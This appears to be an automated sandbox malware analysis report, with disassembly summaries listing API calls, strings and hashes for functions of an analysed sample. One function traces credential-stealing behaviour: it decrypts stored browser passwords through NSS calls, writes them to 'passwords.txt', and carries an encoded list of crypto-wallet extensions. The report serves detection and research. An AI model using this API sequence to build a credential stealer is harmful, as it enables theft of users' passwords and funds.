                                                                                                                                                                                          • API String ID: 1004003707-3402890661
                                                                                                                                                                                          • Opcode ID: 94d1a0babc6a06f6c53ab820ccb9281870574902e366d329e40fb13443cc87fa
                                                                                                                                                                                          • Instruction ID: cbbd1f80542ab1c7e94387839a97299f127c794a447026a50d97f50e8825e4eb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94d1a0babc6a06f6c53ab820ccb9281870574902e366d329e40fb13443cc87fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 965177C1A4736551FA00F1296D11FAE3449EB5A24BF90453AEE0AE1F80FB09D62F85F7
                                                                                                                                                                                          Function 0002A916 Relevance: 65.0, APIs: 34, Strings: 3, Instructions: 211stringmemoryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A922
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,000573A4,0005680F), ref: 0002A9C1
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9D9
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9E1
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9ED
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9F7
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA09
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA15
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA1C
                                                                                                                                                                                          • StrStrA.SHLWAPI(0002B824,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA2D
                                                                                                                                                                                          • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA47
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA5A
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA64
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573A8,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA70
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA7A
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573AC,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA86
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA93
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA9B
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573B0,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAA7
                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAB7
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAC7
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AADA
                                                                                                                                                                                            • Part of subcall function 0002A7D8: _memset.LIBCMT ref: 0002A815
                                                                                                                                                                                            • Part of subcall function 0002A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A830
                                                                                                                                                                                            • Part of subcall function 0002A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0002A838
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A846
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A85A
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A89A
                                                                                                                                                                                            • Part of subcall function 0002A7D8: _memmove.LIBCMT ref: 0002A8BB
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A8EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAE9
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573B4,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAF5
                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB05
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB15
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB28
                                                                                                                                                                                            • Part of subcall function 0002A7D8: lstrcatA.KERNEL32(00056803,00056807,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8E5
                                                                                                                                                                                            • Part of subcall function 0002A7D8: lstrcatA.KERNEL32(00056803,0005680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8FB
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB37
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573B8,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB43
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573BC,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB4F
                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB5F
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002AB7D
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0002ABAC
                                                                                                                                                                                          • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002ABB2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 0002AA0F
                                                                                                                                                                                          • p', xrefs: 0002A931
                                                                                                                                                                                          • passwords.txt, xrefs: 0002AB89
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                                                                                                          • String ID: passwords.txt$p'$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 2725232238-172412305
                                                                                                                                                                                          • Opcode ID: 0ea419e01ceeeb64a46876273c04b97e6439b83c0b3f32c64b664ab54dd4aa72
                                                                                                                                                                                          • Instruction ID: db0c3396ef29ffe985aedf3ab733011eba45ec96e51913e18b251419a60c0fc8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea419e01ceeeb64a46876273c04b97e6439b83c0b3f32c64b664ab54dd4aa72
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9713B32501219BBCF026BA4FC4EDDF7BB9EF4D305B424090FA09A7162DB7459859BB2
                                                                                                                                                                                          Function 6C424470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C424730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C4244B2,6C49E21C,6C49F7F8), ref: 6C42473E
                                                                                                                                                                                            • Part of subcall function 6C424730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C42474A
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C4244BA
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C4244D2
                                                                                                                                                                                          • InitOnceExecuteOnce.KERNEL32(6C49F80C,6C41F240,?,?), ref: 6C42451A
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C42455C
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 6C424592
                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(6C49F770), ref: 6C4245A2
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000008), ref: 6C4245AA
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000018), ref: 6C4245BB
                                                                                                                                                                                          • InitOnceExecuteOnce.KERNEL32(6C49F818,6C41F240,?,?), ref: 6C424612
                                                                                                                                                                                          • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C424636
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(user32.dll), ref: 6C424644
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C42466D
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C42469F
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246AB
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246B2
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246B9
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246C0
                                                                                                                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C4246CD
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 6C4246F1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C4246FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                          • String ID: GIl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                          • API String ID: 1702738223-2712608560
                                                                                                                                                                                          • Opcode ID: f402a31037f98f3637470cbf031552a67d8287cdcebec508eadd5945d6cb9fef
                                                                                                                                                                                          • Instruction ID: d6f22832b57be662674ca77d30227cc0caa3c2ebe6157dede5cc753953445b46
                                                                                                                                                                                          • Opcode Fuzzy Hash: f402a31037f98f3637470cbf031552a67d8287cdcebec508eadd5945d6cb9fef
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A6146B0A01364AFFF10EF60CC4AFA57BB8EB56348F148058F9449B641D7B98981CFA0
                                                                                                                                                                                          Function 6C606E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: EnterCriticalSection.KERNEL32(?,?,?,6C51F9C9,?,6C51F4DA,6C51F9C9,?,?,6C4E369A), ref: 6C4BCA7A
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4BCB26
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,6C4CBE66), ref: 6C606E81
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C4CBE66), ref: 6C606E98
                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C66AAF9,?,?,?,?,?,?,6C4CBE66), ref: 6C606EC9
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C4CBE66), ref: 6C606ED2
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C4CBE66), ref: 6C606EF8
                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606F1F
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606F28
                                                                                                                                                                                          • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606F3D
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C4CBE66), ref: 6C606FA6
                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C66AAF9,00000000,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606FDB
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606FE4
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606FEF
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C607014
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,6C4CBE66), ref: 6C60701D
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C4CBE66), ref: 6C607030
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C4CBE66), ref: 6C60705B
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C4CBE66), ref: 6C607079
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C607097
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C6070A0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                          • String ID: Pdl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                          • API String ID: 593473924-1199163173
                                                                                                                                                                                          • Opcode ID: db0566561f1749ec685317bae1dec3b1f87ca285f864c561c6a6882a2995f15a
                                                                                                                                                                                          • Instruction ID: 4128ac8a0b4a8b0e15a22dc072845fb36f53f9c48324d43c03b76b70ba9aa412
                                                                                                                                                                                          • Opcode Fuzzy Hash: db0566561f1749ec685317bae1dec3b1f87ca285f864c561c6a6882a2995f15a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7514FB1B0451157E31896305C51FFB3666DBA3318F144638E815B6BC1EB25E50E81EB
                                                                                                                                                                                          Function 6C568E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_WrapKey), ref: 6C568E76
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C568EA4
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C568EB3
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C568EC9
                                                                                                                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C568EE5
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C568F17
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C568F29
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C568F3F
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C568F71
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C568F80
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C568F96
                                                                                                                                                                                          • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C568FB2
                                                                                                                                                                                          • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C568FCD
                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C569047
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$ndl
                                                                                                                                                                                          • API String ID: 1003633598-3549646474
                                                                                                                                                                                          • Opcode ID: dd6e90e446901d7e13354e928aa2f4b4cd98fd83cb8113449b1bc77b2c33bf2e
                                                                                                                                                                                          • Instruction ID: 894412652f2a90174822b23926e20c28731fec426c9c457a47d59fb740463830
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd6e90e446901d7e13354e928aa2f4b4cd98fd83cb8113449b1bc77b2c33bf2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: A951A331A01115EBDB00DF52DD88F9A77B6AB8731CF448425F5086BE22D7309968CB9E
                                                                                                                                                                                          Function 00044B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00044B1F
                                                                                                                                                                                          • __mtterm.LIBCMT ref: 00044B2B
                                                                                                                                                                                            • Part of subcall function 000447EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 000447FB
                                                                                                                                                                                            • Part of subcall function 000447EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00044815
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00044B41
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00044B4E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00044B5B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00044B68
                                                                                                                                                                                          • TlsAlloc.KERNEL32 ref: 00044BB8
                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 00044BD3
                                                                                                                                                                                          • __init_pointers.LIBCMT ref: 00044BDD
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044BEE
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044BFB
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044C08
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044C15
                                                                                                                                                                                          • DecodePointer.KERNEL32(Function_0002496E), ref: 00044C36
                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 00044C4B
                                                                                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 00044C65
                                                                                                                                                                                          • __initptd.LIBCMT ref: 00044C70
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00044C77
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
